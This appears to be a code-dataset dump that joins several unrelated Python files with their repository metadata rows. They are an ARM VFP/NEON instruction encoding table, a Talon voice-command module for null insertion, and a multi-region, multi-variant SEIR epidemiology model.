('VNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 1, Q, M, 0, Vm),
('VNEG<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VNMLA<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('UInt(Vd:D);', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VORN<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VORR<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 0, 1, imm4),
('VORR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VPADAL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 0, op, Q, M, 0, Vm),
('VPADD<c>.<dt>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 1, Vm),
('VPADD<c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VPADDL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 1, 0, op, Q, M, 0, Vm),
('VP<op><c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 0, N, Q, M, op, Vm),
('VP<op><c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VQABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 0, Q, M, 0, Vm),
('VQADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 0, N, Q, M, 1, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 1, N, 0, M, 0, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 1, N, 1, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 0, N, 1, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 0, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 1, N, 1, M, 0, Vm),
('VQMOV{U}N<c>.<type><size> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, op2, M, 0, Vm),
('VQNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 1, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 1, M, 0, Vm),
('VQRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 1, Vm),
('VQRSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 1, M, 1, Vm),
('VQSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 1, Vm),
('VQSHL{U}<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 1, op, L, Q, M, 1, Vm),
('VQSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 0, M, 1, Vm),
('VQSUB<c>.<type><size> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 0, N, Q, M, 1, Vm),
('VRADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VRECPE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 0, Q, M, 0, Vm),
('VRECPS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VREV<n><c>.<size> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 0, op2, Q, M, 0, Vm),
('VRHADD<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 1, N, Q, M, 0, Vm),
('VRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 0, Vm),
('VRSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 0, L, Q, M, 1, Vm),
('VRSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 1, M, 1, Vm),
('VRSQRTE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 1, Q, M, 0, Vm),
('VRSQRTS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VRSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 1, L, Q, M, 1, Vm),
('VRSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSHL<c>.I<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 0, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 1, 0, 0, M, 0, Vm),
('VSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 0, L, Q, M, 1, Vm),
('VSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 0, M, 1, Vm),
('VSLI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSQRT<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 1, L, Q, M, 1, Vm),
('VSRI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 0, L, Q, M, 1, Vm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VST3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSTR<c> <Dd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTR<c> <Sd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSUB<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VSUB<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VSUB<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSUBL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 0, 1, op, N, 0, M, 0, Vm),
('VSWP<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 0, Q, M, 0, Vm),
('V<op><c>.8 <Dd>,<list>,<Dm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, Vn, Vd, 1, 0, len_, N, op, M, 0, Vm),
('VTRN<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 1, Q, M, 0, Vm),
('VTST<c>.<size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VUZP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 0, Q, M, 0, Vm),
('VZIP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 1, Q, M, 0, Vm),
]
if __name__ == '__main__':
for description in (VFP_ARMv7 + VFP_Thumb):
instr = description[0]
bits = description[1:]
bits = [1 if type(x) == int else x.bitsize for x in bits]
if sum(bits) != 32:
print(instr, bits, sum(bits))
| 101.136709 | 132 | 0.395329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10,708 | 0.268042 |
33a5d6a0778311e0740b6ce7a927d2f68fa7baf5 | 380 | py | Python | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 5 | 2020-02-16T13:39:10.000Z | 2020-02-19T19:29:56.000Z | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | null | null | null | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 2 | 2020-02-19T15:10:44.000Z | 2020-02-19T16:55:38.000Z | from talon import Context, Module
ctx = Context()
mod = Module()
mod.tag("code_data_null", desc="Tag for enabling commands relating to null")
@mod.action_class
class Actions:
def code_insert_null():
"""Inserts null"""
def code_insert_is_null():
"""Inserts check for null"""
def code_insert_is_not_null():
"""Inserts check for non-null"""
| 20 | 76 | 0.665789 | 215 | 0.565789 | 0 | 0 | 233 | 0.613158 | 0 | 0 | 138 | 0.363158 |
33a71005f3058f76ab1ae55200dbe62d59fe1b2f | 17,810 | py | Python | epidemiology_model.py | sei-international/epidemic-macro-model | 9bb4089c1ed031376304d3024b5593525132d0a7 | [
"Apache-2.0"
] | 4 | 2021-12-17T18:54:49.000Z | 2022-01-03T20:52:17.000Z | epidemiology_model.py | sei-international/epidemic-macro-model | 9bb4089c1ed031376304d3024b5593525132d0a7 | [
"Apache-2.0"
] | null | null | null | epidemiology_model.py | sei-international/epidemic-macro-model | 9bb4089c1ed031376304d3024b5593525132d0a7 | [
"Apache-2.0"
] | null | null | null | from numpy import array as np_array, zeros as np_zeros, sum as np_sum, empty as np_empty, \
amax as np_amax, interp as np_interp, ones as np_ones, tile as np_tile, isnan as np_isnan
import yaml
from seir_model import SEIR_matrix
from common import Window, get_datetime, timesteps_between_dates, get_datetime_array, timesteps_over_timedelta_weeks
from sys import exit
def epidemiology_model():
with open(r'common_params.yaml') as file:
common_params = yaml.full_load(file)
with open(r'regions.yaml') as file:
regions = yaml.full_load(file)
with open(r'seir_params.yaml') as file:
seir_params_multivar = yaml.full_load(file)
nvars=len(seir_params_multivar) # (var=1 is baseline model, var=2 is delta variant)
nregions = len(regions)
epi = []
intl_visitors = []
between_region_mobility_rate = []
between_locality_mobility_rate = []
beds_per_1000 = []
baseline_hosp = []
for rgn in regions:
beds_per_1000.append(rgn['initial']['beds per 1000'])
baseline_hosp.append(rgn['initial']['population'] * rgn['initial']['beds per 1000']/1000)
epivar=[]
for var in seir_params_multivar:
epivar.append(SEIR_matrix(rgn, var, common_params))
if 'international travel' in rgn:
intl_visitors.append(rgn['international travel']['daily arrivals'] * rgn['international travel']['duration of stay'])
else:
intl_visitors.append(0.0)
between_locality_mobility_rate.append(rgn['between locality mobility rate'])
between_region_mobility_rate.append(rgn['between region mobility rate'])
epi.append(epivar) # contains objects with following order: [[rgn1/var1, rgn2/var1], [rgn1/var2, rgn2/var2]]
proportion_total = [e.proportion_global_infected for e in epi[0]]
test1=np_sum(proportion_total,axis=0)
if any(test1<0.999) or any(test1>1.001):
print('Error test1: aborted')
print('proportions of global infections across variants do not sum to 1')
exit()
start_datetime = get_datetime(common_params['time']['COVID start'])
start_time = timesteps_between_dates(common_params['time']['start date'], common_params['time']['COVID start'])
end_time = timesteps_between_dates(common_params['time']['start date'], common_params['time']['end date'])
epi_datetime_array = get_datetime_array(common_params['time']['COVID start'], common_params['time']['end date'])
ntimesteps = end_time - start_time
# All the epidemiological regional models will give the same values for these parameters
epi_invisible_fraction = epi[0][0].invisible_fraction_1stinfection
total_population=0
for i in range(0,len(epi[:][0])):
total_population += epi[i][0].N
normal_bed_occupancy_fraction = common_params['bed occupancy']['normal']
max_reduction_in_normal_bed_occupancy = common_params['bed occupancy']['max reduction']
if 'vaccinate at risk first' in common_params['vaccination']:
vaccinate_at_risk = common_params['vaccination']['vaccinate at risk first']
else:
vaccinate_at_risk = False
avoid_elective_operations= common_params['avoid elective operations']
# Global infection rate per person
global_infection_points = common_params['global infection rate']
global_infection_npoints = len(global_infection_points)
global_infection_traj_start = global_infection_points[0][0]
if get_datetime(global_infection_traj_start) > start_datetime:
global_infection_traj_start = common_params['time']['COVID start']
global_infection_traj_timesteps_array = np_array(range(0,timesteps_between_dates(global_infection_traj_start, common_params['time']['end date']) + 1))
global_infection_ts = np_empty(global_infection_npoints)
global_infection_val = np_empty(global_infection_npoints)
for i in range(0,global_infection_npoints):
global_infection_ts[i] = timesteps_between_dates(global_infection_traj_start, global_infection_points[i][0])
global_infection_val[i] = global_infection_points[i][1]/1000 # Values are entered per 1000
global_infection_rate = np_interp(global_infection_traj_timesteps_array, global_infection_ts, global_infection_val)
# Trunctate at start as necessary
ntrunc = timesteps_between_dates(global_infection_traj_start, common_params['time']['COVID start'])
global_infection_rate = global_infection_rate[ntrunc:]
# Maximum vaccination rate
vaccination_points = common_params['vaccination']['maximum doses per day']
vaccination_delay = timesteps_over_timedelta_weeks(common_params['vaccination']['time to efficacy'])
vaccination_npoints = len(vaccination_points)
vaccination_timesteps_array = np_array(range(0,timesteps_between_dates(common_params['time']['COVID start'], common_params['time']['end date']) + 1))
vaccination_ts = np_empty(vaccination_npoints)
vaccination_val = np_empty(vaccination_npoints)
for i in range(0,vaccination_npoints):
vaccination_ts[i] = timesteps_between_dates(common_params['time']['COVID start'], vaccination_points[i][0]) + vaccination_delay
vaccination_val[i] = vaccination_points[i][1]
vaccination_max_doses = np_interp(vaccination_timesteps_array, vaccination_ts, vaccination_val)
isolate_symptomatic_cases_windows = []
if 'isolate symptomatic cases' in common_params:
for window in common_params['isolate symptomatic cases']:
if window['apply']:
isolate_symptomatic_cases_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
(get_datetime(window['end date']) - start_datetime).days,
window['ramp up for'],
window['ramp down for'],
(1 - epi_invisible_fraction) * window['fraction of cases isolated']))
isolate_at_risk_windows = []
if 'isolate at risk' in common_params:
for window in common_params['isolate at risk']:
if window['apply']:
isolate_at_risk_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
(get_datetime(window['end date']) - start_datetime).days,
window['ramp up for'],
window['ramp down for'],
window['fraction of population isolated']))
test_and_trace_windows = []
if 'test and trace' in common_params:
for window in common_params['test and trace']:
if window['apply']:
test_and_trace_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
(get_datetime(window['end date']) - start_datetime).days,
window['ramp up for'],
window['ramp down for'],
window['fraction of infectious cases isolated']))
soc_dist_windows = []
if 'social distance' in common_params:
for window in common_params['social distance']:
if window['apply']:
soc_dist_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
(get_datetime(window['end date']) - start_datetime).days,
window['ramp up for'],
window['ramp down for'],
window['effectiveness']))
travel_restrictions_windows = []
if 'international travel restrictions' in common_params:
for window in common_params['international travel restrictions']:
if window['apply']:
travel_restrictions_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
(get_datetime(window['end date']) - start_datetime).days,
window['ramp up for'],
window['ramp down for'],
window['effectiveness']))
# Initialize values for indicator graphs
Itot_allvars=np_zeros(nregions)
comm_spread_frac_allvars = np_zeros((nregions, nvars))
deaths = np_zeros((nregions, nvars))
deaths_reinf = np_zeros((nregions, nvars))
cumulative_cases = np_zeros((nregions, nvars))
deaths_over_time = np_zeros((nregions, ntimesteps, nvars))
new_deaths_over_time = np_zeros((nregions, ntimesteps, nvars))
deaths_reinf_over_time = np_zeros((nregions, ntimesteps, nvars))
recovered_over_time = np_zeros((nregions, ntimesteps, nvars))
vaccinated_over_time = np_zeros((nregions, ntimesteps, nvars))
rerecovered_over_time = np_zeros((nregions, ntimesteps, nvars))
mortality_rate_over_time = np_zeros((nregions, ntimesteps, nvars))
hospitalization_index_region = np_ones(nregions)
hospitalization_index = np_ones(ntimesteps)
mortality_rate = np_ones(ntimesteps)
infective_over_time = np_zeros((nregions, ntimesteps, nvars))
reinfective_over_time = np_zeros((nregions, ntimesteps, nvars))
susceptible_over_time = np_zeros((nregions, ntimesteps, nvars))
for j in range(0,nregions):
susceptible_over_time[j,0,:] = [e.S for e in epi[j]]
# susceptible_over_time = np_zeros((nregions, ntimesteps, nvars))
# for j in range(0,nregions):
# e=epi[j]
# for v in range(0, len(e)):
# susceptible_over_time[j,0,v] = e[v].S
exposed_over_time = np_zeros((nregions, ntimesteps, nvars))
for j in range(0,nregions):
exposed_over_time[j,0,:] = [np_sum(e.E_nr) + np_sum(e.E_r) for e in epi[j]]
reexposed_over_time = np_zeros((nregions, ntimesteps, nvars))
for j in range(0,nregions):
reexposed_over_time[j,0,:] = [np_sum(e.RE_nr) + np_sum(e.RE_r) for e in epi[j]]
comm_spread_frac_over_time = np_zeros((nregions, ntimesteps, nvars))
for j in range(0,nregions):
comm_spread_frac_over_time[j,0,:] = [e.comm_spread_frac for e in epi[j]]
for i in range(0, ntimesteps):
# Public health measures
PHA_social_distancing = 0
for w in soc_dist_windows:
PHA_social_distancing += w.window(i)
PHA_travel_restrictions = 0
for w in travel_restrictions_windows:
PHA_travel_restrictions += w.window(i)
PHA_isolate_visible_cases = 0
for w in isolate_symptomatic_cases_windows:
PHA_isolate_visible_cases += w.window(i)
PHA_isolate_at_risk = 0
for w in isolate_at_risk_windows:
PHA_isolate_at_risk += w.window(i)
PHA_isolate_infectious_cases = 0
for w in test_and_trace_windows:
PHA_isolate_infectious_cases += w.window(i)
PHA_isolate_cases = max(PHA_isolate_visible_cases, PHA_isolate_infectious_cases)
public_health_adjustment = (1 - PHA_social_distancing) * (1 - PHA_isolate_cases)
# Beds and Mortality
if avoid_elective_operations:
bed_occupancy_factor = (1 - PHA_social_distancing * max_reduction_in_normal_bed_occupancy)
else:
bed_occupancy_factor = 1
bed_occupancy_fraction = bed_occupancy_factor * normal_bed_occupancy_fraction
#Community spread
for j in range(0, nregions):
comm_spread_frac_allvars[j,:] = [e.comm_spread_frac for e in epi[j]]
# Loop of variants
for v in range(0,nvars):
# Loop over regions
for j in range(0, nregions):
intl_infected_visitors = intl_visitors[j] * (epi[j][v].proportion_global_infected[i]*global_infection_rate[i]) * min(0, 1 - PHA_travel_restrictions)
dom_infected_visitors = 0
# Confirm current variant has been introduced already
if epi_datetime_array[i] >= epi[j][v].start_time:
if nregions > 1:
for k in range(0, nregions):
if k != j:
dom_infected_visitors += epi[k][v].Itot_prev * between_region_mobility_rate[k]/(nregions - 1)
# Run the model for one time step
epi[j][v].update(total_population,
dom_infected_visitors + intl_infected_visitors,
between_locality_mobility_rate[j],
public_health_adjustment,
PHA_isolate_at_risk,
bed_occupancy_fraction,
beds_per_1000[j],
vaccination_max_doses[i],
vaccinate_at_risk,
Itot_allvars[j],
comm_spread_frac_allvars[j],
nvars)
# Update values for indicator graphs
new_deaths_over_time[j,i,v] = epi[j][v].new_deaths + epi[j][v].new_deaths_reinf
deaths[j,v] += epi[j][v].new_deaths
deaths_reinf[j,v] += epi[j][v].new_deaths_reinf
#susceptible_over_time[j,i,v] = epi[j][v].S
exposed_over_time[j,i,v] = np_sum(epi[j][v].E_nr) + np_sum(epi[j][v].E_r)
reexposed_over_time[j,i,v] = np_sum(epi[j][v].RE_nr) + np_sum(epi[j][v].RE_r)
infective_over_time[j,i,v] = epi[j][v].Itot
reinfective_over_time[j,i,v] = epi[j][v].RItot
deaths_over_time[j,i,v] = deaths[j,v]
deaths_reinf_over_time[j,i,v] = deaths_reinf[j,v]
vaccinated_over_time[j,i,v] = epi[j][v].vaccinated
rerecovered_over_time[j,i,v] = epi[j][v].RR
cumulative_cases[j,v] += (1 - epi[j][v].invisible_fraction_1stinfection) * (epi[j][v].I_nr[1] + epi[j][v].I_r[1]) + \
(1 - epi[j][v].invisible_fraction_reinfection) * (epi[j][v].RI_nr[1] + epi[j][v].RI_r[1])
comm_spread_frac_over_time[j,i,v] = epi[j][v].comm_spread_frac
mortality_rate_over_time[j,i,v] = epi[j][v].curr_mortality_rate
# Calculate hospitalisation index across variants and track infected fraction across variants
Itot_allvars=np_zeros(nregions) ## Breaks if one variant infects everyone
hospitalized=np_zeros(nregions)
for j in range(0, nregions):
# Infected by regions
for e in epi[j]:
Itot_allvars[j]+= e.Itot_incl_reinf # add total infected for each variant in that region
hosp_per_infective_1stinfections = (1 - e.invisible_fraction_1stinfection) * e.ave_fraction_of_visible_1stinfections_requiring_hospitalization
hosp_per_infective_reinfections = (1 - e.invisible_fraction_reinfection) * e.ave_fraction_of_visible_reinfections_requiring_hospitalization
hospitalized[j] += ( hosp_per_infective_1stinfections * np_sum(e.I_r + e.I_nr) + hosp_per_infective_reinfections * np_sum(e.RI_r + e.RI_nr) )
hospitalization_index_region[j] = bed_occupancy_fraction + hospitalized[j] /baseline_hosp[j]
hospitalization_index[i] = np_amax(hospitalization_index_region)
mortality_rate[i] = np_sum(new_deaths_over_time[:,i,:] )/total_population* 100000 # per 100,000
#True up susceptible pools, total population and recovered pools between variants
for j in range(0, nregions):
for v in range(0,nvars):
if nvars>1:
if i==0:
epi[j][v].S-= (np_sum(epi[j][~v].E_nr[1]) + np_sum(epi[j][~v].E_r[1]) + np_sum(epi[j][~v].Itot))
if i > 0:
epi[j][v].S= max(0, epi[j][v].S - (np_sum(epi[j][~v].E_nr[1]) + np_sum(epi[j][~v].E_r[1])))
epi[j][v].N -= ( epi[j][~v].new_deaths +epi[j][~v].new_deaths_reinf)
if epi_datetime_array[i] < epi[j][v].start_time:
epi[j][v].S= max(0, epi[j][v].S - (epi[j][~v].vaccinated_nr + epi[j][~v].vaccinated_r))
epi[j][v].R_nr = epi[j][~v].R_nr
epi[j][v].R_r = epi[j][~v].R_r
else:
epi[j][v].R_nr -= epi[j][~v].new_reexposed_nr
epi[j][v].R_r -= epi[j][~v].new_reexposed_r
susceptible_over_time[j,i,v] = epi[j][v].S
recovered_over_time[j,i,v] = np_sum(epi[j][v].R_nr) + np_sum(epi[j][v].R_r)
return nvars, seir_params_multivar, nregions, regions, start_time, end_time, epi_datetime_array, susceptible_over_time, \
exposed_over_time, infective_over_time, recovered_over_time, vaccinated_over_time, deaths_over_time, deaths_reinf_over_time, reexposed_over_time, reinfective_over_time, \
rerecovered_over_time, hospitalization_index | 56.719745 | 178 | 0.607805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,661 | 0.14941 |
33a772f892d4ed50cf326d5af75052977fcc4c7b | 695 | py | Python | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
